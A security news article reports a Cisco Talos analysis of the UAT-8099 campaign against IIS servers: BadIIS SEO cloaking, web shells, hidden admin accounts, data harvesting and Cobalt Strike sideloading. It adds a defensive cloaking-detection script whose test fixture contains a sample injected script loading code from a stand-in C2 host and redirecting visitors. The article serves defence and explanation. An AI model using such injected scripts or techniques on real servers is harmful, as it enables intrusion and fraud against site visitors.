Search with a Catch: How One Click on Google Can Hand Your Server to Hackers

Major organizations worldwide have already fallen victim to this sophisticated scheme.

The hacker group UAT-8099 is currently running an active campaign to promote malicious content in search engine results by compromising Microsoft IIS servers in various countries. Researchers from Cisco Talos have discovered that members of this Chinese-language group combine search engine spam with the theft of sensitive data—from configuration files to SSL certificates. The victims include universities, telecom companies, and technology organizations in India, Thailand, Vietnam, Canada, and Brazil.
To achieve their goal, the attackers select authoritative yet vulnerable IIS servers, where they deploy web shells and the BadIIS malware, which masks their activity and replaces web page content. They use publicly available tools for privilege escalation, after which they deploy the FRP reverse proxy, SoftEther VPN, and the EasyTier utility to the server. They then activate the Guest account with administrative privileges, enable remote access via RDP, and create a hidden user with permanent administrator rights.
After establishing control over the system, UAT-8099 members proceed to analyze files: they review logs, configurations, stored credentials, and certificates, including with the help of the "Everything" utility. The harvested information is archived using WinRAR and prepared for exfiltration from the server. To protect their own infrastructure, the attackers additionally install D_Safe_Manage—a legitimate tool that prevents interference from other threat actors.
The malicious logic implemented in the BadIIS component is of particular interest. It allows for the covert execution of redirects and the injection of malicious scripts, hidden from both users and search engines. Request processing depends on the values of the HTTP User-Agent and Referer headers. If a request comes from Googlebot and contains keywords like "casino" or "bonus," it is proxied through.
However, if the request comes from a real user arriving from a search engine, JavaScript code is injected. This code downloads a file from a C2 server and redirects the user to a fake website—typically one hosting illegal content or gambling advertisements.
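Because BadIIS keys its behaviour on the User-Agent and Referer headers, a defender can surface this kind of cloaking by requesting the same URL twice, once as a crawler and once as a browser arriving from a search engine, and diffing what comes back. The script below is an added example written for this article, not code from Cisco Talos or from the malware; the HTML samples and hostnames (`c2.example`, `gamble.example`, `www.example.edu`) are constructed, and the header sets and keyword list are assumptions about what such a check should send and look for.

```python
"""Detect User-Agent/Referer-based cloaking by comparing the page served to a
crawler-like request with the page served to a search-engine visitor.
Added example for this article; sample pages and hosts are constructed."""

import re
import urllib.request
from dataclasses import dataclass, field
from typing import List, Set

# Two views of the same URL. Assumption: the server decides on these headers.
CRAWLER_HEADERS = {
    "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}
VISITOR_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
    "Referer": "https://www.google.com/search?q=example",
}

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
HOST_RE = re.compile(r"^(?:https?:)?//([^/]+)", re.I)
# Client-side redirect idioms an injected script would use (assumed list).
REDIRECT_RE = re.compile(
    r"(?:window\.)?location(?:\.href)?\s*=|location\.replace\(|http-equiv\s*=\s*['\"]refresh", re.I)
# Terms the article names as the SEO-spam trigger, plus two assumed neighbours.
SEO_KEYWORDS = ("casino", "bonus", "slot", "betting")


@dataclass
class CloakingReport:
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def external_script_hosts(html: str, own_host: str) -> Set[str]:
    """Hostnames of <script src=...> tags that do not point at our own host."""
    hosts = set()
    for src in SCRIPT_SRC_RE.findall(html):
        m = HOST_RE.match(src)
        if m and m.group(1).lower() != own_host.lower():
            hosts.add(m.group(1).lower())
    return hosts


def compare_responses(crawler_html: str, visitor_html: str, own_host: str) -> CloakingReport:
    """Flag the three symptoms the article describes: third-party script only for
    visitors, a redirect only for visitors, and spam keywords only for the crawler."""
    report = CloakingReport()
    only_for_visitors = external_script_hosts(visitor_html, own_host) - external_script_hosts(crawler_html, own_host)
    for host in sorted(only_for_visitors):
        report.findings.append(f"script from {host} served only to search visitors")
    if REDIRECT_RE.search(visitor_html) and not REDIRECT_RE.search(crawler_html):
        report.findings.append("client-side redirect served only to search visitors")
    crawler_text, visitor_text = crawler_html.lower(), visitor_html.lower()
    hits = [k for k in SEO_KEYWORDS if k in crawler_text and k not in visitor_text]
    if hits:
        report.findings.append("spam keywords shown only to crawler: " + ", ".join(hits))
    return report


def probe(url: str, own_host: str, timeout: float = 10.0) -> CloakingReport:
    """Live check against a server you administer (network access required)."""
    def fetch(headers):
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return compare_responses(fetch(CRAWLER_HEADERS), fetch(VISITOR_HEADERS), own_host)


# Constructed samples: a clean page, and the two faces of a cloaked page.
CLEAN_PAGE = ("<html><head><title>Department of Physics</title></head><body><h1>Welcome</h1>"
              "<script src='https://www.example.edu/static/app.js'></script></body></html>")
CRAWLER_VIEW = ("<html><head><title>Best online casino bonus 2025</title></head><body>"
                "<h1>Welcome</h1><a href='https://spam.example/casino'>casino bonus</a></body></html>")
VISITOR_VIEW = ("<html><head><title>Department of Physics</title></head><body><h1>Welcome</h1>"
                "<script src='https://c2.example/loader.js'></script>"
                "<script>window.location.href='https://gamble.example/';</script></body></html>")


def demo() -> CloakingReport:
    """Run the comparison on the constructed cloaked pair."""
    return compare_responses(CRAWLER_VIEW, VISITOR_VIEW, "www.example.edu")


if __name__ == "__main__":
    for line in demo().findings:
        print("FINDING:", line)
    print("clean page suspicious:", compare_responses(CLEAN_PAGE, CLEAN_PAGE, "www.example.edu").suspicious)
```

On the constructed pair the check reports the third-party script and the redirect that only visitors receive, and the gambling keywords that only the crawler sees; the clean page compared with itself produces no findings. Run `probe()` only against servers you operate, and compare against a request with no Referer as well, since some variants key on that header alone.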
Researchers identified two distinct clusters of samples of the new BadIIS version. One is notable for its extremely low detection rate, while the other contains debug strings in Simplified Chinese. Both variants use the WriteEntityChunks API to embed content into the server's response, complicating network-level detection and evading traffic analysis systems. At the same time, they implement full-fledged logic for SEO manipulation: the malware feeds Google dozens of backlinks with HTML content that mimics authoritative pages. This allows the compromised sites to be promoted in search results.
For long-term persistence on a compromised server, the group employs DLL sideloading and loads Cobalt Strike through the legitimate Windows component inetinfo.exe. The first stage of the loader is placed in wmicodegen.dll, and then, through a chain of decryption, several layers of payload are unpacked, including a custom loader and a beacon disguised as CDN and Exchange traffic.
According to experts, this hybrid attack, which combines malicious SEO manipulation with credential theft, indicates a high level of preparation and a well-structured infrastructure. In each case, the attackers meticulously customize the environment, taking into account the target region's language, scanner signatures, and defense mechanisms, thereby reducing the likelihood of detection.